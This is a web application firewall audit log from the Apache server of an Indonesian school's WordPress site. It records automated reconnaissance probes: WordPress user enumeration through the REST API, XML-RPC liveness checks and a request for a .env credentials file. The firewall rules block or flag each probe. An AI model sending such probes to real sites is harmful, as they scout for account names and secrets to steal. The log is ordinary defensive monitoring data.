Stopwatch2: 1747433564654748 2783; combined=1235, p1=436, p2=762, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeb8d469-Z-- --29214609-A-- [17/May/2025:05:12:51 +0700] aCe4YwTOsBn9MSWb6WJqIAAAAJI 103.236.140.4 56490 103.236.140.4 8181 --29214609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29214609-C-- demo.sayHello --29214609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29214609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747433571928090 4878 (- - -) Stopwatch2: 1747433571928090 4878; combined=3786, p1=461, p2=3125, p3=25, p4=26, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29214609-Z-- --7eef047c-A-- [17/May/2025:05:24:59 +0700] aCe7O3yxdQCiyU1ENFciXgAAAAY 103.236.140.4 56550 103.236.140.4 8181 --7eef047c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7eef047c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7eef047c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434299805638 3420 (- - -) Stopwatch2: 1747434299805638 3420; combined=1446, p1=476, p2=939, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7eef047c-Z-- --31aebd6f-A-- [17/May/2025:05:25:07 +0700] aCe7Q3yxdQCiyU1ENFciYAAAAAk 103.236.140.4 56554 103.236.140.4 8181 --31aebd6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31aebd6f-C-- demo.sayHello --31aebd6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31aebd6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434307973515 6708 (- - -) Stopwatch2: 1747434307973515 6708; combined=4865, p1=591, p2=4025, p3=42, p4=43, p5=98, sr=81, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31aebd6f-Z-- --082dcf42-A-- [17/May/2025:05:25:29 +0700] aCe7WQTOsBn9MSWb6WJqJgAAAIY 103.236.140.4 56558 103.236.140.4 8181 --082dcf42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --082dcf42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --082dcf42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434329210236 2811 (- - -) Stopwatch2: 1747434329210236 2811; combined=1233, p1=422, p2=782, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --082dcf42-Z-- --06d0173d-A-- [17/May/2025:05:25:33 +0700] aCe7XXyxdQCiyU1ENFciYgAAAAw 103.236.140.4 56562 103.236.140.4 8181 --06d0173d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06d0173d-C-- demo.sayHello --06d0173d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06d0173d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434333859106 5071 (- - -) Stopwatch2: 1747434333859106 5071; combined=3859, p1=499, p2=3159, p3=26, p4=25, p5=89, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06d0173d-Z-- --3a8c514e-A-- [17/May/2025:05:30:41 +0700] aCe8kXyxdQCiyU1ENFcjoAAAABU 103.236.140.4 33918 103.236.140.4 8181 --3a8c514e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a8c514e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a8c514e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434641792136 2908 (- - -) Stopwatch2: 1747434641792136 2908; combined=1292, p1=424, p2=833, p3=0, p4=0, p5=35, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a8c514e-Z-- --c9be7c38-A-- [17/May/2025:05:30:46 +0700] aCe8lnyxdQCiyU1ENFcjsgAAAAY 103.236.140.4 34054 103.236.140.4 8181 --c9be7c38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9be7c38-C-- demo.sayHello --c9be7c38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9be7c38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434646066848 6642 (- - -) Stopwatch2: 1747434646066848 6642; combined=4818, p1=667, p2=3900, p3=38, p4=43, p5=101, sr=141, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9be7c38-Z-- --493a3e72-A-- [17/May/2025:05:30:59 +0700] aCe8o3yxdQCiyU1ENFcj2QAAAAg 103.236.140.4 34454 103.236.140.4 8181 --493a3e72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --493a3e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --493a3e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434659204530 2692 (- - -) Stopwatch2: 1747434659204530 2692; combined=1357, p1=432, p2=894, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --493a3e72-Z-- --bcc15501-A-- [17/May/2025:05:31:06 +0700] aCe8qhKi5m5upc8uMd6fxQAAAM8 103.236.140.4 34670 103.236.140.4 8181 --bcc15501-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcc15501-C-- demo.sayHello --bcc15501-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcc15501-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434666174824 6977 (- - -) Stopwatch2: 1747434666174824 6977; combined=5020, p1=599, p2=4131, p3=67, p4=44, p5=105, sr=75, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcc15501-Z-- --3ef7b84b-A-- [17/May/2025:05:34:56 +0700] aCe9kHyxdQCiyU1ENFclRQAAAAs 103.236.140.4 40394 103.236.140.4 8181 --3ef7b84b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ef7b84b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ef7b84b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434896741224 3568 (- - -) Stopwatch2: 1747434896741224 3568; combined=1456, p1=486, p2=932, p3=0, p4=0, p5=37, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ef7b84b-Z-- --8f979042-A-- [17/May/2025:05:35:03 +0700] aCe9l3yxdQCiyU1ENFclSAAAABE 103.236.140.4 40400 103.236.140.4 8181 --8f979042-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f979042-C-- demo.sayHello --8f979042-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f979042-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434903192720 5869 (- - -) Stopwatch2: 1747434903192720 5869; combined=4238, p1=556, p2=3413, p3=32, p4=37, p5=121, sr=71, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f979042-Z-- --1259776a-A-- [17/May/2025:05:37:36 +0700] aCe-MHyxdQCiyU1ENFclSQAAAA8 103.236.140.4 40404 103.236.140.4 8181 --1259776a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.250.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.250.227 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --1259776a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1259776a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747435056269374 782 (- - -) Stopwatch2: 1747435056269374 782; combined=314, p1=272, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1259776a-Z-- --2da1313d-A-- [17/May/2025:05:42:46 +0700] aCe_ZgTOsBn9MSWb6WJtcQAAAIw 103.236.140.4 40532 103.236.140.4 8181 --2da1313d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2da1313d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2da1313d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435366784724 2320 (- - -) Stopwatch2: 1747435366784724 2320; combined=1087, p1=392, p2=669, p3=0, p4=0, p5=26, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2da1313d-Z-- --3daf9d2e-A-- [17/May/2025:05:42:52 +0700] aCe_bHyxdQCiyU1ENFclewAAAAM 103.236.140.4 40550 103.236.140.4 8181 --3daf9d2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3daf9d2e-C-- demo.sayHello --3daf9d2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3daf9d2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435372882587 5417 (- - -) Stopwatch2: 1747435372882587 5417; combined=4092, p1=530, p2=3349, p3=29, p4=31, p5=91, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3daf9d2e-Z-- --344d6752-A-- [17/May/2025:05:42:54 +0700] aCe_bgTOsBn9MSWb6WJtcgAAAIo 103.236.140.4 40554 103.236.140.4 8181 --344d6752-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --344d6752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --344d6752-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435374522698 2358 (- - -) Stopwatch2: 1747435374522698 2358; combined=1098, p1=342, p2=730, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --344d6752-Z-- --daae8838-A-- [17/May/2025:05:42:59 +0700] aCe_c3yxdQCiyU1ENFclhAAAABE 103.236.140.4 40572 103.236.140.4 8181 --daae8838-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --daae8838-C-- demo.sayHello --daae8838-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --daae8838-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435379307313 4438 (- - -) Stopwatch2: 1747435379307313 4438; combined=3467, p1=407, p2=2883, p3=20, p4=19, p5=80, sr=65, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daae8838-Z-- --7f42d456-A-- [17/May/2025:05:48:01 +0700] aCfAoRKi5m5upc8uMd6hTgAAANA 103.236.140.4 41284 103.236.140.4 8181 --7f42d456-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7f42d456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f42d456-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) 